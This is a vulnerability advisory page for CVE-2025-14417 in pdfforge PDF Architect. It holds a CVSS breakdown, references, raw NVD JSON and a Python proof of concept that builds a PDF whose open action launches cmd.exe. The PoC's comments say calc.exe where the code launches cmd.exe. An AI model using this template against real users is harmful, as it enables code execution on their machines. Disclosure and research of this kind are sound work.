CVE-2025-14417

Description

pdfforge PDF Architect Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27501.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:* - VULNERABLE

pdfforge PDF Architect < 最新修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

"
# CVE-2025-14417 PoC - PDF Architect Launch Action RCE
# This PoC demonstrates the insufficient UI warning issue in PDF Architect
# Note: This is for educational and security research purposes only

import sys

def create_malicious_pdf():
    """
    Generate a malicious PDF with Launch action to execute arbitrary commands
    This PoC creates a PDF that attempts to execute calc.exe on Windows
    """
    
    # Malicious PDF content with Launch action
    # The Launch action in PDF allows executing external applications
    # PDF Architect fails to warn users before executing these actions
    
    pdf_template = """%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R /AA << /O 5 0 R >> >>
endobj
4 0 obj
<< /Length 44 >>
stream
BT
/F1 12 Tf
100 700 Td
(PDF Architect Launch Action RCE Test) Tj
ET
endstream
endobj
5 0 obj
<< /Type /Action /S /Launch /F (cmd.exe) /NewWindow true >>
endobj
xref
0 6
0000000000 65535 f 
0000000009 00000 n 
0000000058 00000 n 
0000000115 00000 n 
0000000266 00000 n 
0000000358 00000 n 
trailer
<< /Size 6 /Root 1 0 R >>
startxref
427
%%EOF"""
    
    # In a real attack scenario, the attacker would:
    # 1. Craft a more sophisticated PDF with embedded scripts
    # 2. Use social engineering to get the victim to open the file
    # 3. Execute commands with the same privileges as the PDF Architect process
    
    return pdf_template

def main():
    print("CVE-2025-14417 - PDF Architect Launch Action RCE PoC")
    print("=" * 60)
    print("Target: pdfforge PDF Architect")
    print("Vulnerability: Insufficient UI Warning for Launch Actions")
    print("CVSS Score: 7.8 (High)")
    print("=" * 60)
    print()
    print("This PoC demonstrates the vulnerability by generating")
    print("a malicious PDF file with a Launch action that could")
    print("execute arbitrary commands without user warning.")
    print()
    print("In real attacks:")
    print("1. Attacker creates a malicious PDF with Launch action")
    print("2. Victim opens the PDF in PDF Architect")
    print("3. PDF Architect executes the command without warning")
    print("4. Attacker gains code execution on victim's system")
    print()
    
    # Generate the malicious PDF
    pdf_content = create_malicious_pdf()
    
    # Save to file (for demonstration purposes)
    output_file = "CVE-2025-14417_poc.pdf"
    with open(output_file, 'w') as f:
        f.write(pdf_content)
    
    print(f"Malicious PDF generated: {output_file}")
    print("WARNING: This is for educational purposes only!")

if __name__ == "__main__":
    main()
"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14417
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14417
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14417/
[4] VulDB https://vuldb.com/cve/CVE-2025-14417
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-1074/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14417", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.647", "lastModified": "2026-01-02T21:48:12.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pdfforge PDF Architect Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27501."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABF2DE43-AF21-4EFD-917E-1E57E0E1FF15"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1074/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}